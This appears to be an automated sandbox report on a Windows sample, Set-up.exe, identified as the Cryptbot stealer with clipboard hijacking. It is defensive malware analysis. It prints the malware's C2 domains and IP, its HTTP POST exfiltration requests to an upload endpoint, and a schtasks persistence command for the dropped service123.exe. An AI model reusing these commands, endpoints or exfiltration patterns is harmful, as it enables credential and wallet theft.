Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name: Set-up.exe
Analysis ID: 1520814
MD5: ff8b81c5bdbb09987a4ed216ae0010c2
SHA1: 1d5edf417a676e8e04a69dd94dac6a2a934cdfa6
SHA256: d6a055bee4a39f5879ff522099df86cd0a0001228cac589b3f07449a5a822fef
Tags: Cryptbotexeuser-4k95m
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection
barindex
Found malware configuration
Source: Set-up.exe.7328.0.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["analforeverlovyu.top", "+twelvevh12pt.top", "twelvevh12pt.top"]}
Multi AV Scanner detection for submitted file
Source: Set-up.exe ReversingLabs: Detection: 42%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B15D0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 4_2_004B15D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F14E0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 4_2_6C2F14E0
Uses 32bit PE files
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 4_2_004B8320
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C3B6C50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C3B6C50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C3C9920h 4_2_6C310C40
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FED09
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C3BAE90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C3BAE90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C3BAE90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C3BAE90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FEE80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C366E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C366FE0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F285F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FE8E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C312910
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C320971
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C320971
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C320971
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F297F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F29BE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F29FD
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C31E9D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C340A30
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F2A3C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FEA31
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C320A1C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FEA97
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F2AF1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C320ACC
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F2B30
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F2B6F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C320B7C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FCB40
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FEB80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 4_2_6C348BE0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F2BD3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C30C470
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31C470
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31C50C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FE510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C31C540
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31C540
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 4_2_6C36A5B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C31C5DC
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C368640
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C368640
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C368640
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31C68C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FE700
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FE7B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C3127F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C3AA030
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C31C02C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FC070
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31C0DC
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C3680C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C35C11E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C35C11A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C31C240
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C35C2DE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C31C2DC
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C35C2DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C312340
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FC380
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2F2390
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBC33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FDC60
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBC7E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBC58
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C30DCA0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBCB5
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C31BC90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBC9F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C31DCE0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBCC7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 4_2_6C31BD2C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C363D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBD06
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 4_2_6C38BD70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBDFF
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C367DE0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FDEE0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31BEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBED2
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31BF5C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C31BF90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 4_2_6C31BF90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FD8A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FF880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C3598F3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FB8E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C3638C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 4_2_6C38B970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C311960
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBA80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FDAF0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBAD0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 4_2_6C38FB20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBB7B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C367B50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FDB90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBBF8
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FBBC4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6C3C801Ch 4_2_6C35F430
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FD4C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C33F5A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 4_2_6C3575E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 4_2_6C35F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C35D67E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 4_2_6C35D67A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FD645
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 4_2_6C31F6B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FD6B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FB750
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FD1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C2F1400h 4_2_6C2FD3A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then jmp 6C357260h 4_2_6C3573D0

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49730 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49733 -> 185.244.181.140:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49731 -> 185.244.181.140:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: analforeverlovyu.top
Source: Malware configuration extractor URLs: +twelvevh12pt.top
Source: Malware configuration extractor URLs: twelvevh12pt.top
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.244.181.140 185.244.181.140
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: BELCLOUDBG BELCLOUDBG
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary54044084User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 413Host: twelvevh12pt.top
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary53892879User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 89642Host: twelvevh12pt.top
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary49242685User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 31921Host: twelvevh12pt.top
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: twelvevh12pt.top
Source: unknown HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary54044084User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 413Host: twelvevh12pt.top
Source: Set-up.exe, 00000000.00000003.2040016353.000000000130B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevh12pt.top/
Source: Set-up.exe, 00000000.00000003.2040016353.000000000130B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevh12pt.top/v1/upload.php
Source: Set-up.exe, 00000000.00000003.2040016353.000000000130B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://twelvevh12pt.top/v1/upload.php&&
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ehMlFMzYcqQvKbiEUyBC.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: Set-up.exe String found in binary or memory: https://serviceupdate32.com/update
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Set-up.exe, 00000000.00000003.1809199031.00000000031E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30ADD6 CloseHandle,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard, 4_2_6C30ADD6
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30AE52 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 4_2_6C30AE52
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30AF41 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 4_2_6C30AF41
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C30ADD6 CloseHandle,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard, 4_2_6C30ADD6

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\Set-up.exe File dump: service123.exe.0.dr 314613760 Jump to dropped file
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B3E80 4_2_004B3E80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_004B5140 4_2_004B5140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C332E93 4_2_6C332E93
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2FEE80 4_2_6C2FEE80
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C300F20 4_2_6C300F20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C326830 4_2_6C326830
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C352870 4_2_6C352870
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C350AA0 4_2_6C350AA0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C306B10 4_2_6C306B10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2FCB40 4_2_6C2FCB40
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C33EB90 4_2_6C33EB90
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C340020 4_2_6C340020
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3BE230 4_2_6C3BE230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C308260 4_2_6C308260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C332245 4_2_6C332245
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C333C50 4_2_6C333C50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F3D20 4_2_6C2F3D20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2FFDC0 4_2_6C2FFDC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C305850 4_2_6C305850
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C34B850 4_2_6C34B850
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3038B0 4_2_6C3038B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C337AB0 4_2_6C337AB0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3B7520 4_2_6C3B7520
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F3580 4_2_6C2F3580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3535D0 4_2_6C3535D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C2F9790 4_2_6C2F9790
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C3517F0 4_2_6C3517F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4_2_6C323180 4_2_6C323180
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3BE060 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3BDB70 appears 55 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3BFD50 appears 71 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3BDCE0 appears 106 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3B4BD0 appears 65 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C3BFE40 appears 65 times
PE file contains more sections than normal
Source: Set-up.exe Static PE information: Number of sections : 18 > 10
Uses 32bit PE files
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\wYZaUCGaRz Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\yneBJZQGdgAJyOIYcNTc
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: Set-up.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Set-up.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Set-up.exe ReversingLabs: Detection: 42%
Source: Set-up.exe String found in binary or memory: /addr_imp
Source: unknown Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
